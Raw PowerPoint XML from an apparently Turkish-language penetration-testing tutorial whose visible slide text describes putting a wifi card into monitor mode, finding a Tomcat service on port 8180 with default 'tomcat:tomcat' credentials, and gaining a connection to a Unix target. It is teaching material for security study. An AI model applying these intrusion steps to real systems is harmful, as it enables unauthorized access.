                  <a:pt x="1101638" y="-38347"/>
                  <a:pt x="1328298" y="44705"/>
                  <a:pt x="1599634" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1870970" y="-44705"/>
                  <a:pt x="1881560" y="56513"/>
                  <a:pt x="2117826" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2354092" y="-56513"/>
                  <a:pt x="2393411" y="43126"/>
                  <a:pt x="2636017" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2878623" y="-43126"/>
                  <a:pt x="3149977" y="4338"/>
                  <a:pt x="3289389" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3428801" y="-4338"/>
                  <a:pt x="3604717" y="14717"/>
                  <a:pt x="3762520" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3920323" y="-14717"/>
                  <a:pt x="4231275" y="73891"/>
                  <a:pt x="4506012" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4510961" y="271008"/>
                  <a:pt x="4493290" y="304625"/>
                  <a:pt x="4506012" y="568248"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4518734" y="831871"/>
                  <a:pt x="4504515" y="906180"/>
                  <a:pt x="4506012" y="1033178"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4507509" y="1160176"/>
                  <a:pt x="4478798" y="1420084"/>
                  <a:pt x="4506012" y="1549767"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4533226" y="1679450"/>
                  <a:pt x="4475080" y="1982920"/>
                  <a:pt x="4506012" y="2092185"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4536944" y="2201450"/>
                  <a:pt x="4494374" y="2443816"/>
                  <a:pt x="4506012" y="2582945"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4264721" y="2642794"/>
                  <a:pt x="4100538" y="2519283"/>
                  <a:pt x="3942761" y="2582945"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3784984" y="2646607"/>
                  <a:pt x="3624566" y="2574839"/>
                  <a:pt x="3469629" y="2582945"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3314692" y="2591051"/>
                  <a:pt x="3162197" y="2543987"/>
                  <a:pt x="2906378" y="2582945"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2650559" y="2621903"/>
                  <a:pt x="2456413" y="2543738"/>
                  <a:pt x="2253006" y="2582945"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2049599" y="2622152"/>
                  <a:pt x="1874926" y="2515403"/>
                  <a:pt x="1689755" y="2582945"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1504584" y="2650487"/>
                  <a:pt x="1462203" y="2566634"/>
                  <a:pt x="1261683" y="2582945"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1061163" y="2599256"/>
                  <a:pt x="947751" y="2527694"/>
                  <a:pt x="788552" y="2582945"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="629353" y="2638196"/>
                  <a:pt x="174557" y="2542509"/>
                  <a:pt x="0" y="2582945"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-15401" y="2466859"/>
                  <a:pt x="8807" y="2246105"/>
                  <a:pt x="0" y="2066356"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-8807" y="1886607"/>
                  <a:pt x="34493" y="1801019"/>
                  <a:pt x="0" y="1549767"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-34493" y="1298515"/>
                  <a:pt x="47033" y="1194444"/>
                  <a:pt x="0" y="1059007"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-47033" y="923570"/>
                  <a:pt x="48789" y="730814"/>
                  <a:pt x="0" y="619907"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-48789" y="509000"/>
                  <a:pt x="15354" y="129578"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="3810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396ACA2B-8198-3D59-A8F1-31BC096FB098}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5647765" y="952107"/>
            <a:ext cx="6096000" cy="646331"/>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Hedef sistemde bulunan portların seviş versiyonlarındaki zafiyetin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>dercesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>allowed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> durumundaysa direkt bağlantı sağlanır.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Dikdörtgen 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D5E4B0D-5744-6CF5-3582-6F414D428F9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="136578" y="3101788"/>
            <a:ext cx="3126575" cy="4332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5439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615F30CD-DF9A-010C-77B6-070176892475}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="139699" y="127000"/>
            <a:ext cx="11852617" cy="5562600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Dikdörtgen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60810A71-F06D-A2A8-6C6F-6AA0A95513FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10566400" y="5021943"/>
            <a:ext cx="1204686" cy="34834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Dikdörtgen 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EBB466F-1481-E7EE-E3F4-EBD70D7EBE48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3700130" y="5039833"/>
            <a:ext cx="1786270" cy="27644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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC934139-9404-4BD1-5A56-F67990191CFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593265" y="499730"/>
            <a:ext cx="6581554" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>wlan0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>wifi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> kartımızı monitör </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>mode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> geçiriyoruz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>wlan0mon ismini alıyor.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Düz Ok Bağlayıcısı 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27237EAB-5A09-F03A-26E9-3A3594C02847}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8516471" y="1326776"/>
            <a:ext cx="2617694" cy="33348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Düz Ok Bağlayıcısı 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D3F8937-A1DC-DAC5-8021-B72A6DE8D2B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4980841" y="1132541"/>
            <a:ext cx="2379183" cy="36482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029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ekran, ekran görüntüsü, levha içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{860D168D-F263-8026-51D6-C51869F6FB43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="6331"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4" name="Çerçeve 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC6A06FA-4DC0-3491-0295-DC52B9E5BB46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271463" y="2514600"/>
            <a:ext cx="3857625" cy="3429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 name="Çerçeve 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16CA682B-76EC-54D7-1EFE-DBD6B3772554}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="785813" y="2200275"/>
            <a:ext cx="2371725" cy="314325"/>
          </a:xfrm>
          <a:prstGeom prst="fra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solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Sağ Ok 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF370C33-E7B1-2C09-4EA2-880326CE31B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3300413" y="2200275"/>
            <a:ext cx="1385887" cy="1571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tr-TR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Sağ Ok 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB2569F6-F1E3-AF1D-A6AA-0685BD29A36A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4129088" y="2593181"/>
            <a:ext cx="1385887" cy="15716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61DEDF1C-0C48-E3A1-9738-AB5804F74809}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4889256" y="2073575"/>
            <a:ext cx="3857624" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Bağlantının sağlandığını söylüyor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Metin kutusu 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2B90E4B-12FD-4EF5-0364-238D700B37DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5846126" y="2514600"/>
            <a:ext cx="4276176" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Sistemin Unix olduğu söylüyor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Çerçeve 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4355DEA-0A5F-4ADF-8F96-6ACBA3DD2C83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="785813" y="3000375"/>
            <a:ext cx="1042987" cy="4286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3" name="Sağ Ok 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71DD7FA8-163A-55C2-7E8A-B7F595F941F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1971675" y="3071812"/>
            <a:ext cx="1514475" cy="214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57B6F2A6-549A-757F-19EF-7FD7CA82764D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3486150" y="3014662"/>
            <a:ext cx="8015288" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Kullanılır komutları görmek için «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>help</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> «komutunu kullanıyoruz.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3747882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F4D7411F-13E5-FE88-709E-76FAFBE12762}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="142874" y="-1"/>
            <a:ext cx="5953125" cy="4371975"/>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80E89E78-C1B1-64DB-1466-7B11DDFB7785}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6095999" y="0"/>
            <a:ext cx="6095999" cy="4371974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Çerçeve 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{991452C9-D400-E7ED-4BC2-515AAA48A593}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6343650" y="2071688"/>
            <a:ext cx="3086100" cy="112871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7" name="Çerçeve 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EE49607-D75D-0DC4-6FAB-981C1EB2E9BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2686049"/>
            <a:ext cx="4371975" cy="16859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9" name="Resim 8" descr="metin içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64835B56-BBCD-6E9B-E07A-B123BFDC3F61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3174" y="4371974"/>
            <a:ext cx="12188824" cy="2486026"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="220666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B62DDA-687B-166B-A046-BC277CD002E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>8180 /TCP portunun açık olduğunu ve çalışan bir servisin olduğunu ama tam olarak ne çalıştığını göstermiyor. Bize alt satırlarda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>default</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> olarak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Apache</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Tomcat’in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(web uygulamalarımızı yayınlayabildiğimiz web sunucusu) olabileceğini, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>admin</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password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> bilgilerinin şunlar olabileceğini söylüyor. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tomcat:tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> kritik olduğundan bahsetmiş. Web browser üzerinden ip adresimiz ve portu yazdığımızda ne olacağını göreceğiz.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="İçerik Yer Tutucusu 4" descr="metin içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E7DE19B-2567-3C4E-B0E9-4F7F88E28EBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
